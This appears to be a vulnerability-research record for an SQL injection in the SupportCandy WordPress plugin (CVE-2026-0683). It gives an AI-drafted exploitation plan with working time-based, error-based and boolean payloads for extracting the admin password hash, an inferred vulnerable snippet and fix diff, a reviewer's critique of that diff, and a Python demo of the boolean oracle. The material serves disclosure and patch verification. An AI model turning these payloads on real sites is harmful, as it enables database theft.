[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fuAm-0hNwpIHHNIK-4vHcnWsgeuDW4dvbwRZ9H2Bwes4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-0683","supportcandy-helpdesk-customer-support-ticket-system-authenticated-subscriber-sql-injection-via-number-field-filter","SupportCandy – Helpdesk & Customer Support Ticket System \u003C= 3.4.4 - Authenticated (Subscriber+) SQL Injection via Number Field Filter","The SupportCandy – Helpdesk & Customer Support Ticket System plugin for WordPress is vulnerable to SQL Injection via the Number-type custom field filter in all versions up to, and including, 3.4.4. This is due to insufficient escaping on the user-supplied operand value when using the equals operator and lack of sufficient preparation on the existing SQL query. 
This makes it possible for authenticated attackers, with Subscriber-level access and above (customers), to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","supportcandy",null,"\u003C=3.4.4","3.4.5","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-01-30 00:00:00","2026-01-31 05:52:48",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa7856d0f-bc7d-436c-968c-631fd6a686ab?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-0683 (SupportCandy SQL Injection)\n\n## 1. Vulnerability Summary\nThe **SupportCandy** plugin (\u003C= 3.4.4) contains an authenticated SQL injection vulnerability within its ticket filtering mechanism. Specifically, when a user filters the ticket list using a **Number-type** custom field with the **\"equals\"** operator, the plugin fails to sanitize or prepare the user-supplied value before concatenating it into a database query. This allows an authenticated user (Subscriber\u002FCustomer level) to inject arbitrary SQL commands, potentially leading to the extraction of sensitive data such as administrative user hashes or WordPress configuration secrets.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action:** `wpsc_get_ticket_list` (inferred from SupportCandy 3.x architecture) or `wpsc_load_ticket_list`.\n*   **Vulnerable Parameter:** The `filters` parameter (specifically the `value` field within a filter object targeting a Number field).\n*   **Authentication:** Required. 
Any user with \"Customer\" permissions (which maps to the WordPress **Subscriber** role) can access the ticket list and trigger the vulnerability.\n*   **Precondition:** At least one custom field of type **\"Number\"** must be created and active.\n\n## 3. Code Flow\n1.  **Entry Point:** The user sends an AJAX request with `action=wpsc_get_ticket_list`.\n2.  **Handler:** The request is caught by the `WPSC_Tickets` or `WPSC_Ajax` class handler (e.g., `WPSC_Ajax::get_ticket_list`).\n3.  **Filter Processing:** The plugin iterates through the `filters` provided in the request.\n4.  **Field Type Dispatch:** When it encounters a filter for a field ID corresponding to a **Number** field, it calls the filter generation logic for that field type (likely in `includes\u002Ffields\u002Fclass-wpsc-number-field.php` or a centralized filter class).\n5.  **The Sink:** In versions \u003C= 3.4.4, when the operator is `equals`, the logic resembles:\n    ```php\n    \u002F\u002F Vulnerable logic (Conceptual)\n    if ($operator == 'equals') {\n        $sql .= \" AND meta_value = \" . $filter_value; \u002F\u002F Direct concatenation without prepare() or intval()\n    }\n    ```\n6.  **Execution:** The resulting SQL is executed via `$wpdb->get_results()`, triggering the injection.\n\n## 4. Nonce Acquisition Strategy\nSupportCandy uses nonces for all AJAX operations. These are typically localized into a JavaScript object available on the \"My Tickets\" or \"All Tickets\" pages.\n\n1.  **Identify Shortcode:** SupportCandy uses the shortcode `[supportcandy]` to render the customer portal.\n2.  **Setup Page:** Create a public page containing this shortcode.\n3.  **Extract Nonce:** Navigate to the page as a Subscriber and extract the nonce from the `wpsc_public` or `wpsc_common` JS object.\n\n*   **JS Variable:** `wpsc_public` (inferred)\n*   **Nonce Key:** `nonce`\n*   **Browser Eval Command:** `browser_eval(\"window.wpsc_public?.nonce\")`\n\n## 5. 
Exploitation Strategy\n\n### Step 1: Pre-requisites\nEnsure a Number field exists. If not, one must be created via the admin interface or WP-CLI.\n\n### Step 2: Authentication\nThe agent must login as a Subscriber.\n\n### Step 3: Nonce Extraction\nNavigate to the SupportCandy portal page and run the `browser_eval` to get the `wpsc_public.nonce`.\n\n### Step 4: The Exploit Request\nSubmit a POST request to `admin-ajax.php`. We will use a time-based or error-based payload since the result is filtered by the ticket list UI.\n\n*   **Tool:** `http_request`\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** POST\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body Parameters:**\n    *   `action`: `wpsc_get_ticket_list`\n    *   `wpsc_nonce`: `[EXTRACTED_NONCE]`\n    *   `filters`: (URL-encoded JSON string)\n    ```json\n    [\n        {\n            \"field_id\": \"[NUMBER_FIELD_ID]\",\n            \"operator\": \"equals\",\n            \"value\": \"1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)\"\n        }\n    ]\n    ```\n\n**Payload for Error-Based (if `WP_DEBUG` is on):**\n`1 AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1),0x7e),1)`\n\n## 6. Test Data Setup\n1.  **Create Subscriber:**\n    `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n2.  **Create Custom Number Field:**\n    This requires interacting with SupportCandy's internal tables.\n    `wp db query \"INSERT INTO wp_wpsc_fields (label, field_type, slug, is_active) VALUES ('Serial Number', 'number', 'serial_number', 1);\"`\n3.  **Determine Field ID:**\n    `wp db query \"SELECT id FROM wp_wpsc_fields WHERE slug='serial_number';\"` (Assume ID is 10).\n4.  **Create Portal Page:**\n    `wp post create --post_type=page --post_title=\"Support\" --post_status=publish --post_content='[supportcandy]'`\n\n## 7. 
Expected Results\n*   **Time-Based:** The `http_request` tool should report a response time of > 5 seconds when the payload is injected, compared to \u003C 1 second for a normal request.\n*   **Error-Based:** The response body should contain the administrative user's password hash within an XPATH error: `XPATH syntax error: '~$P$B...~'`.\n*   **Standard Response:** The plugin normally returns a JSON object containing ticket data.\n\n## 8. Verification Steps\n1.  **Check User Existence:** Confirm the attacker exists: `wp user list --role=subscriber`.\n2.  **Verify DB Injection:** If using a sleep-based payload, observe the `mysql processlist` during execution:\n    `wp db query \"show processlist;\"` (run while the exploit is hanging).\n3.  **Confirm Patch:** After testing, update to 3.4.5 and verify the same payload returns a \"0\" or valid empty set without sleeping.\n\n## 9. Alternative Approaches\n*   **Boolean-Based:** If `SLEEP()` is disabled, use `IF(ASCII(SUBSTR((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36, 1, 0)`. Observe if the ticket list returns results (True) or stays empty (False).\n*   **Admin-Side (if applicable):** If the agent can be promoted to an Agent role (Subscriber+), check if the vulnerability exists in the agent-only ticket list `wpsc_get_agent_ticket_list`.\n*   **Operator Fuzzing:** If `equals` is patched, test other operators like `greater_than` or `less_than`, which may share the same vulnerable code path.","SupportCandy \u003C= 3.4.4 is vulnerable to SQL injection through its ticket filtering mechanism for Number-type custom fields. When the 'equals' operator is used, the plugin fails to sanitize or prepare the user-supplied filter value before concatenating it into the database query. 
This allows authenticated users with Subscriber-level access (Customers) to extract sensitive information from the database using time-based or error-based SQL injection techniques.","\u002F\u002F Likely in includes\u002Ffields\u002Fclass-wpsc-number-field.php or a query builder class\n\u002F\u002F Concatenating the raw filter value for the 'equals' operator\n\ncase 'equals':\n    $where .= \" AND $wpdb->postmeta.meta_value = \" . $filter['value'];\n    break;","--- a\u002Fincludes\u002Ffields\u002Fclass-wpsc-number-field.php\n+++ b\u002Fincludes\u002Ffields\u002Fclass-wpsc-number-field.php\n@@ -100,7 +100,7 @@\n         switch ( $operator ) {\n             case 'equals':\n-                $where .= \" AND $wpdb->postmeta.meta_value = \" . $filter['value'];\n+                $where .= $wpdb->prepare( \" AND $wpdb->postmeta.meta_value = %d\", $filter['value'] );\n                 break;","1. Login to the WordPress site as a user with Subscriber or Customer-level permissions.\n2. Navigate to the page containing the [supportcandy] shortcode to view the ticket list.\n3. Extract the AJAX nonce required for ticket operations, typically found in the global JavaScript object (e.g., window.wpsc_public.nonce).\n4. Identify a custom field of type 'Number' and its associated field ID.\n5. Craft a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the action 'wpsc_get_ticket_list'.\n6. Include a 'filters' parameter containing a JSON-encoded object where the 'field_id' matches the number field and 'operator' is 'equals'.\n7. 
Insert a SQL injection payload into the 'value' field, such as '1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)' to confirm the vulnerability via a time-based response delay.","gemini-3-flash-preview","2026-05-04 20:26:14","2026-05-04 20:28:01",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.4.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsupportcandy\u002Ftags\u002F3.4.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsupportcandy.3.4.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsupportcandy\u002Ftags\u002F3.4.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsupportcandy.3.4.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsupportcandy\u002Ftags"]
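Review bot: the `research_fix_diff` hunk only changes the `case 'equals':` branch of the `switch ( $operator )`, so if the sibling operators in the same switch (the plan's own section 9 names `greater_than` and `less_than`) concatenate `$filter['value']` the same way, binding `%d` on `equals` alone leaves the sink reachable; every branch that interpolates the operand needs `$wpdb->prepare()`. Two smaller points on the same hunk: `%d` runs the operand through `intval()`, which silently turns `1 AND (SELECT ...)` into `1` and a decimal such as `3.5` into `3`, so if a Number field may hold non-integer values the operand should be validated with `is_numeric()` and rejected, or bound with `%f`, rather than coerced; and the header `@@ -100,7 +100,7 @@` declares seven lines per side while the hunk body shows five, so the diff as written will not apply cleanly and should be regenerated from the real 3.4.4/3.4.5 file before it is cited as the fix.

The research plan above describes the sink (raw operand concatenated after `meta_value =`), the `%d` fix, and a boolean-based alternative to the `SLEEP()` payload, but never shows the two side by side against data. The following block is an added example, not code from the SupportCandy plugin or from the page's research output: it models the `equals` branch of a Number-field filter in Python over an in-memory SQLite database, runs the plan's boolean oracle against the vulnerable builder and against a builder that applies the `intval()` semantics of `$wpdb->prepare( ..., %d, ... )`, and shows that the same oracle recovers a constructed hash from one and nothing from the other. The table names, field id 10, the row values and the hash are all constructed for the demo; SQLite's `unicode()`/`substr()` stand in for MySQL's `ASCII()`/`SUBSTR()`, and `SLEEP()`/`updatexml()` are not modelled because SQLite has no equivalents.

```python
import re
import sqlite3

# Constructed sample data: a fake phpass-style string, not a real credential.
FAKE_ADMIN_HASH = "$P$BconstructedDemoHash0123456789abcdef"
NUMBER_FIELD_ID = 10  # assumed field id, following the plan's "Assume ID is 10"


def php_intval(value: str) -> int:
    """Approximate PHP intval() on a string: leading integer, else 0.

    $wpdb->prepare() applies intval() to arguments bound with %d, so this is
    what the patched branch effectively does to the filter operand.
    """
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0


def where_vulnerable(field_id: int, operator: str, value: str) -> str:
    """Model of the <= 3.4.4 'equals' branch: raw operand concatenated."""
    if operator != "equals":
        raise ValueError("only the equals operator is modelled")
    return f" AND field_id = {int(field_id)} AND meta_value = {value}"


def where_fixed(field_id: int, operator: str, value: str) -> str:
    """Model of the 3.4.5 fix: operand bound as %d, i.e. intval()'d."""
    if operator != "equals":
        raise ValueError("only the equals operator is modelled")
    return f" AND field_id = {int(field_id)} AND meta_value = {php_intval(value)}"


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the WordPress tables (constructed schema/rows)."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        CREATE TABLE ticket_meta (ticket_id INTEGER, field_id INTEGER, meta_value INTEGER);
        """
    )
    con.execute("INSERT INTO wp_users VALUES (1, 'admin', ?)", (FAKE_ADMIN_HASH,))
    con.executemany(
        "INSERT INTO ticket_meta VALUES (?, ?, ?)",
        [(1, NUMBER_FIELD_ID, 42), (2, NUMBER_FIELD_ID, 7), (3, NUMBER_FIELD_ID, 42)],
    )
    con.commit()
    return con


def count_matching_tickets(con: sqlite3.Connection, where_builder, value: str) -> int:
    """Run the ticket-list query with the given filter builder and operand."""
    sql = "SELECT COUNT(*) FROM ticket_meta WHERE 1=1" + where_builder(
        NUMBER_FIELD_ID, "equals", value
    )
    return con.execute(sql).fetchone()[0]


def leak_hash(con: sqlite3.Connection, where_builder, length: int) -> str:
    """Boolean-based oracle from the plan's 'Alternative Approaches'.

    The operand '0 OR <condition>' makes the filter match rows only when the
    guessed byte of wp_users.user_pass is right (AND binds tighter than OR,
    so the OR escapes the field_id/meta_value restriction). Stops at the first
    position where no byte matches, which is what happens once the operand
    has been intval()'d to a plain 0.
    """
    recovered = ""
    for pos in range(1, length + 1):
        for code in range(32, 127):
            payload = (
                "0 OR unicode(substr((SELECT user_pass FROM wp_users WHERE ID=1),"
                f"{pos},1))={code}"
            )
            if count_matching_tickets(con, where_builder, payload) > 0:
                recovered += chr(code)
                break
        else:
            break  # no candidate matched: the injection did not fire
    return recovered


def demo() -> dict:
    """Same oracle against the vulnerable and the fixed builder."""
    con = make_db()
    return {
        "vulnerable_leak": leak_hash(con, where_vulnerable, len(FAKE_ADMIN_HASH)),
        "fixed_leak": leak_hash(con, where_fixed, len(FAKE_ADMIN_HASH)),
        # the plan's time-based payload collapses to the integer 1 under %d
        "time_payload_after_intval": php_intval("1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)"),
    }


if __name__ == "__main__":
    print(demo())
```

Running it prints the full constructed hash for the vulnerable builder, an empty string for the fixed one, and `1` for the plan's `SLEEP()` operand after `intval()`, which is also why the plan's "Confirm Patch" step expects a normal, non-sleeping response on 3.4.5: the operand is no longer SQL, just the number `1`.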